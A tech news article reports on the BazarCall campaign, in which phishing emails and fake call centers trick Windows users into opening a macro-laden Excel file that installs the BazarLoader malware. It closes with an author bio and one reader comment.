Windows Users Tricked into Ransomware Attack at Call Centers

Call Centers Ransomware Featured

This is something repeatedly said here on Make Tech Easier, as we report the news: every time the scammers and bad actors develop a new attack, the tech industry finds a way to fight back and close that vulnerability. This causes the attackers to go back to the drawing board and create a new attack. It just continues on and on. The newest attack point for ransomware is call centers. Will this force Microsoft to amp up its game to fight back?

Call Centers Ransomware Attack

While this battle has now escalated to the attackers becoming emboldened to set up fake call centers, it means the ball’s in Microsoft’s court to stop them. Microsoft has a team of cybersecurity researchers on the case. They’re after the BazarCall group for the ransomware attack that hit the call centers.

Users who place a call into the call centers wind up with their PCs infected with a malware loader known as BazarLoader that distributes malware.

The BazarCall (aka Bazacall) group has been at this since the beginning of the year. They use call center operators to convince callers to install BazarLoader onto their PCs.

Call Centers Ransomware Phishing Email

Brad Duncan, with the Palo Alto Networks cybersecurity company, described the attack by saying, “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment, and exploit other vulnerable hosts on the network.”

The attack starts with a Windows user receiving a phishing email. This informs them that a subscription trial has expired and that they will be charged a fee. To avoid this, they need to call and cancel.

The focus of the Microsoft Security Intelligence team is on the emails that target Office 365 users. A sample email is from the attackers claiming to be from a tech company. The email says the user will be charged when a demo expires in 24 hours.

“When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file to cancel the service. The Excel file contains a malicious macro that downloads the payload,” described the security team.

Call Centers Ransomware Cyberattack

Microsoft’s team also said the Cobalt Strike penetration testing kit is used to obtain credentials. The kit is often used after a system is initially compromised. Among the information stolen is the Active Directory database that includes identity and credential information gathered by Cobalt Strike.

After the Attack

Again, this is just part of a round-robin situation and is a bit alarming to consider where it will lead to next. BazarCall used a familiar attack but carried it out in such a way to make users unsuspecting. Not all users would expect that the call centers they are being directed to would kick off a ransomware attack.

But now that the Microsoft security team is onto BazarCall and figured out the attack, the cybercriminals will be forced to move onto a new destructive plan. And that’s where the alarm comes in: what will the attackers do next? How will they up their game this time?

Read on to learn more about ransomware and how to protect yourself. Also learn how to enable ransomware protection in Windows Defender.

Laura Tucker Laura Tucker

Laura has spent nearly 20 years writing news, reviews, and op-eds, with more than 10 of those years as an editor as well. She has exclusively used Apple products for the past three decades. In addition to writing and editing at MTE, she also runs the site's sponsored review program.

One comment

  1. “This informs them that a subscription trial has expired and that they will be charged a fee.”
    Don’t people keep track of their subscriptions??? If it is a subscription that they do not recognize, that should be a big, red flag.

    “download an Excel file to cancel the service”
    Another big, red flag! Why wouldn’t any clear thinking person question why it is necessary to download an EXCEL file to cancel anything rather than just tell the person on the other side of the phone to do it?!

    ” it means the ball’s in Microsoft’s court to stop them”
    Microsoft can start by quitting to force software “updates” and downloads on the users. How are the users to distinguish between a legitimate update and some sketchy software that will install a Microsoft tracker or, even worse, will install malware. After every Win 10 update, the Internet is full of articles on how to fix the problems that update introduced. Doesn’t MakeTechEasier have a running article on how to fix problems created by the latest MS update?

Leave a Comment

Yeah! You've decided to leave a comment. That's fantastic! Check out our comment policy here. Let's have a personal and meaningful conversation.